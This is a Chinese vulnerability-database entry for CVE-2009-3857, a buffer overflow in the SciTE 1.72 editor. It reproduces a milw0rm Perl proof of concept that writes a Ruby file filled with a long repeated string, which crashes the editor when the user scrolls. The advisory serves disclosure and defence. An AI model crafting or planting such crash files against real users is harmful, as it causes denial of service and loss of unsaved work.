投稿
https://www.exploit-db.com/exploits/9133
https://www.securityfocus.com/bid/43612
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200911-037
Softonic Scite 缓冲区溢出漏洞
| 漏洞ID | 1118103 | 漏洞类型 | 缓冲区溢出 |
| 发布时间 | 2009-07-13 | 更新时间 | 2009-07-13 |
 CVE编号
|
CVE-2009-3857 |  CNNVD-ID
|
CNNVD-200911-037 |
| 漏洞平台 | Windows | CVSS评分 | 4.3 |
|漏洞来源
|漏洞详情
SoftonicScite时一个文本编辑器,常用于开发和运行程序。SoftonicInternationalScite1.72中存在缓冲区溢出漏洞。远程攻击者可以借助一个包含长字符串的Ruby(.rb)文件来触发缓冲区溢出(当使用滚动条时),引起拒绝服务攻击(应用程序崩溃)。
|漏洞EXP
#!/usr/bin/perl
#
#######################################################################
#
# ScITE Editor 1.72 crash vulnerability Exploit
#
########################################################################
#
# Bug Founded by prodigy
#
########################################################################
# ### PoC ### #
############################################################################################
my $owned="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;
open(myfile,'>>crash.rb');
print myfile $owned;
close(myfile);
############################################################################################
[!]Usage: when you created the file is open with SciTE, and move the scroll bars
############################################################################################
#Greetz: Greetz myself for find the bug, and all the people of undersecurity.net
##########################################################################################
# milw0rm.com [2009-07-13]|受影响的产品
Scintilla SciTE 1.72
|参考资料
来源:XF
名称:scite-editor-file-dos(51674)
链接:http://xforce.iss.net/xforce/xfdb/51674
来源:MILW0RM
名称:9133
链接:http://www.milw0rm.com/exploits/9133
检索漏洞
开始时间
结束时间